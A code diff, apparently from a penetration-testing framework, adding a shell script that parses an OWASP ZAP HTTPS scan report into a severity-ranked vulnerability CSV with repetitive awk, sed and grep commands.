awk 'FNR==26' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==27' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==28' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==29' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==30' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==31' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==32' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==33' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==34' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==35' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==36' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==37' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==38' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==39' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==40' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==50' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==51' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==52' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==53' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==54' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==55' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==56' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==57' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==58' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==59' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==60' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
|
||||
egrep '^High' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P2 - HIGH, " $2 ", http://" $50 ", " $3}' > /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Medium' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P3 - MEDIUM, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Low' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P4 - LOW, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Informational' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P5 - INFO, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
|
||||
mv -f /tmp/report_final.csv $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
rm -f /tmp/report_final.csv /tmp/report.csv /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null 2> /dev/null
|
||||
|
|
@ -0,0 +1,73 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='OWASP Zap Scan - HTTPS'
|
||||
FILENAME="$LOOT_DIR/web/zap-report-${TARGET}-https.html"
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
|
||||
rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep '<name>' -A20 | egrep '<name>|<riskdesc>|<uri>|<desc>' > /tmp/raw_out.txt 2> /dev/null
|
||||
grep '<name>' /tmp/raw_out.txt 2> /dev/null| cut -d'<' -f2 | cut -d'>' -f2 > /tmp/vulns.txt 2> /dev/null
|
||||
grep '<riskdesc>' /tmp/raw_out.txt 2> /dev/null| cut -d'<' -f2 | cut -d'>' -f2 > /tmp/risk.txt 2> /dev/null
|
||||
grep '<desc>' /tmp/raw_out.txt 2> /dev/null| cut -d\; -f3 > /tmp/desc.txt 2> /dev/null
|
||||
|
||||
awk 'FNR==1' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' > /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==2' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==3' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==4' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==5' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==6' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==7' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==8' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==9' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==10' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==11' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==12' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==13' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==14' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==15' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==16' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==17' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==18' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==19' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==20' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==21' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==22' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==23' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==24' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==25' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==26' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==27' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==28' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==29' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==30' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==31' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==32' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==33' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==34' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==35' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==36' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==37' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==38' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==39' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==40' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==50' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==51' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==52' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==53' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==54' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==55' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==56' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==57' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==58' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==59' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==60' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
|
||||
egrep '^High' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P2 - HIGH, " $2 ", http://" $50 ", " $3}' > /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Medium' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P3 - MEDIUM, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Low' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P4 - LOW, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Informational' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P5 - INFO, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
|
||||
mv -f /tmp/report_final.csv $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
rm -f /tmp/report_final.csv /tmp/report.csv /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null 2> /dev/null
|
||||
Loading…
Reference in New Issue